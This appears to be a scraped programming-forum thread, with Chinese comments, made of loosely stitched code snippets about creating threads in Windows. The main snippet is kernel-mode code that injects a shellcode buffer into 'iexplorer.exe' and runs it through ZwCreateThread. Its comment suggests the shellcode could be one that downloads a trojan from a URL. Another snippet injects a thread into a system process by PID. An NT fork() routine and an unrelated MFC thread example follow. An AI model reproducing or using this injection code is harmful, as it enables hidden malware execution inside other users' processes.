15,471
社区成员
发帖
与我相关
我的任务
分享
unsigned char shellcode[1024*4]={...}//一个ring3的shellcode,可以想象一下~~比如从url下载木马的...
HANDLE CreateUserThread(
IN HANDLE hProcess,
IN PVOID EntryPoint,
IN ULONG RegEax,
IN ULONG RegEbx
)
{
USER_STACK stack = {0};
CONTEXT context;
NTSTATUS status;
ULONG AllocSize = PAGE_SIZE * 2;
PVOID p;
ULONG OldProtect;
HANDLE hThread = (HANDLE)0;
PCLIENT_ID cid;
status = ZwAllocateVirtualMemory(hProcess,
&stack.ExpandableStackBottom,
0,
&AllocSize,
MEM_RESERVE,
PAGE_READWRITE);
if (NT_SUCCESS(status))
{
stack.ExpandableStackBase = (PUCHAR)stack.ExpandableStackBottom + PAGE_SIZE;
stack.ExpandableStackLimit = stack.ExpandableStackBase;
AllocSize = PAGE_SIZE;
p = (PCHAR)stack.ExpandableStackBase - AllocSize;
status = ZwAllocateVirtualMemory(hProcess,
&p,
0,
&AllocSize,
MEM_COMMIT,
PAGE_READWRITE);
if (NT_SUCCESS(status))
{
AllocSize = PAGE_SIZE;
status = ZwProtectVirtualMemory(hProcess,
&p,
&AllocSize,
PAGE_READWRITE | PAGE_GUARD,
&OldProtect);
if (NT_SUCCESS(status))
{
cid = ExAllocatePool(PagedPool, sizeof(CLIENT_ID));
context.ContextFlags = CONTEXT_FULL;
context.SegCs = 0x18;
context.SegFs = 0x38;
context.SegEs = 0x20;
context.SegDs = 0x20;
context.SegSs = 0x20;
context.SegGs = 0x00;
context.EFlags = 0x3000;
context.Esp = (ULONG)stack.ExpandableStackBase - 4;
context.Eip = (ULONG)EntryPoint;
context.Eax = RegEax;
context.Ebx = RegEbx;
status = ZwCreateThread(&hThread,
THREAD_ALL_ACCESS,
NULL,
hProcess,
cid,
&context,
&stack,
FALSE);
ExFreePool(cid);
if (NT_SUCCESS(status)) return hThread;
}
AllocSize = 0;
ZwFreeVirtualMemory(hProcess,
&p,
&AllocSize,
MEM_RELEASE);
}
AllocSize = PAGE_SIZE * 2;
ZwFreeVirtualMemory(hProcess,
&stack.ExpandableStackBottom,
&AllocSize,
MEM_DECOMMIT);
return NULL;
}
HANDLE WriteShellToProcess()
{
HANDLE hProcess;
DWORD pid;
CLIENT_ID ClientId;
NTSTATUS stat;
OBJECT_ATTRIBUTES obj;
PVOID EntryPoint=0;
ULONG AllocSize = PAGE_SIZE * 10;
getprocessptr(0,L"iexplorer.exe",&pid);
ClientId.UniqueProcess = (HANDLE)pid;
ClientId.UniqueThread = 0;
InitializeObjectAttributes(&obj,
NULL,
OBJ_CASE_INSENSITIVE,
NULL,
NULL);
stat = ZwOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&obj,&ClientId);
if(NT_SUCCESS(stat))
{
stat = ZwAllocateVirtualMemory(hProcess,
&EntryPoint,
0,
&AllocSize,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if(NT_SUCCESS(stat))
{
stat = ZwWriteVirtualMemory(hProcess, EntryPoint, shellcode, sizeof(shellcode), 0);
if(NT_SUCCESS(stat))
{
return CreateUserThread(hProcess,EntryPoint,0,0);
}
}
}
return NULL;
}
#include "ntdll.h"
#include <stdio.h>
namespace NT {
extern "C" {
NTSTATUS
NTAPI
CsrClientCallServer(
IN PVOID Message,
IN PVOID,
IN ULONG Opcode,
IN ULONG Size
);
}
}
VOID InheritAll()
{
ULONG n = 0x1000;
PULONG p = new ULONG[n];
while (NT::ZwQuerySystemInformation(NT::SystemHandleInformation, p, n * sizeof *p, 0)
== STATUS_INFO_LENGTH_MISMATCH)
delete [] p, p = new ULONG[n *= 2];
NT::PSYSTEM_HANDLE_INFORMATION h = NT::PSYSTEM_HANDLE_INFORMATION(p + 1);
ULONG pid = GetCurrentProcessId();
for (ULONG i = 0; i < *p; i++)
if (h[i].ProcessId == pid)
SetHandleInformation(HANDLE(h[i].Handle), HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);
delete [] p;
}
VOID InformCsrss(HANDLE hProcess, HANDLE hThread, ULONG pid, ULONG tid)
{
struct CSRSS_MESSAGE {
ULONG Unknown1;
ULONG Opcode;
ULONG Status;
ULONG Unknown2;
};
struct {
NT::PORT_MESSAGE PortMessage;
CSRSS_MESSAGE CsrssMessage;
PROCESS_INFORMATION ProcessInformation;
NT::CLIENT_ID Debugger;
ULONG CreationFlags;
ULONG VdmInfo[2];
} csrmsg = {{0}, {0}, {hProcess, hThread, pid, tid}, {0}, 0, {0}};
NT::CsrClientCallServer(&csrmsg, 0, 0x10000, 0x24);
}
__declspec(naked) int child()
{
typedef BOOL (WINAPI *CsrpConnectToServer)(PWSTR);
// CsrpConnectToServer(0x77F68CC0)(L"\\Windows");
// CsrpConnectToServer(0x77F8F65D)(L"\\Windows");
CsrpConnectToServer(0x77F922F5)(L"\\Windows");
__asm mov eax, 0
__asm mov esp, ebp
__asm pop ebp
__asm ret
}
#pragma optimize("y", off) // disable frame pointer omission
int fork()
{
HANDLE hProcess, hThread;
InheritAll();
NT::OBJECT_ATTRIBUTES oa = {sizeof oa};
NT::ZwCreateProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, NtCurrentProcess(), TRUE, 0, 0, 0);
NT::CONTEXT context = {CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS | CONTEXT_FLOATING_POINT};
NT::ZwGetContextThread(NtCurrentThread(), &context);
context.Eip = ULONG(child);
MEMORY_BASIC_INFORMATION mbi;
NT::ZwQueryVirtualMemory(NtCurrentProcess(), PVOID(context.Esp),
NT::MemoryBasicInformation, &mbi, sizeof mbi, 0);
NT::USER_STACK stack = {0, 0, PCHAR(mbi.BaseAddress) + mbi.RegionSize,
mbi.BaseAddress, mbi.AllocationBase};
NT::CLIENT_ID cid;
NT::ZwCreateThread(&hThread, THREAD_ALL_ACCESS, &oa,
hProcess, &cid, &context, &stack, TRUE);
NT::THREAD_BASIC_INFORMATION tbi;
NT::ZwQueryInformationThread(NtCurrentThread(), NT::ThreadBasicInformation,
&tbi, sizeof tbi, 0);
NT::PNT_TIB tib = tbi.TebBaseAddress;
NT::ZwQueryInformationThread(hThread, NT::ThreadBasicInformation, &tbi, sizeof tbi, 0);
NT::ZwWriteVirtualMemory(hProcess, tbi.TebBaseAddress,
&tib->ExceptionList, sizeof tib->ExceptionList, 0);
InformCsrss(hProcess, hThread, ULONG(cid.UniqueProcess), ULONG(cid.UniqueThread));
NT::ZwResumeThread(hThread, 0);
NT::ZwClose(hThread);
NT::ZwClose(hProcess);
return int(cid.UniqueProcess);
}
#pragma optimize("", on)
int main()
{
int n = fork();
Sleep(n * 10);
Beep(100, 100);
printf("%d\n", n);
return 0;
}
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,0,dwpid);//dwpid就是某些个系统进程ID
USER_STACK stack = {0};
DWORD ret;
ULONG n = 1024*1024;//1MB
ret=ZwAllocateVirtualMemory(hProcess, &stack.ExpandableStackBottom, 0, &n,MEM_RESERVE, PAGE_READWRITE);
stack.ExpandableStackBase = PCHAR(stack.ExpandableStackBottom) +1024*1024;
stack.ExpandableStackLimit = PCHAR(stack.ExpandableStackBase) - 4096;
n = 4096 + PAGE_SIZE;
PVOID p = PCHAR(stack.ExpandableStackBase) - n;
ret=ZwAllocateVirtualMemory(hProcess, &p, 0, &n, MEM_COMMIT, PAGE_READWRITE);
ULONG x; n = PAGE_SIZE;
ret=ZwProtectVirtualMemory(hProcess, &p, &n, PAGE_READWRITE | PAGE_GUARD, &x);
CONTEXT context = {CONTEXT_FULL};
ret=ZwGetContextThread(GetCurrentThread(),&context);
context.Esp = ULONG(stack.ExpandableStackBase) - 2048;
context.Eip = ULONG(startaddress);
CLIENT_ID cid;
ret=ZwCreateThread(&hThread, THREAD_ALL_ACCESS, 0, hProcess, &cid, &context, &stack, TRUE);
if(ret) MessageBox(0,"ZwCreateThread","",0);
UINT MyThreadProc( LPVOID pParam )
{
CMyObject* pObject = (CMyObject*)pParam;
if (pObject == NULL ||
!pObject->IsKindOf(RUNTIME_CLASS(CMyObject)))
return 1; // if pObject is not valid
// do something with 'pObject'
return 0; // thread completed successfully
}
// inside a different function in the program
.
.
.
pNewObject = new CMyObject;
AfxBeginThread(MyThreadProc, pNewObject);
.
.
.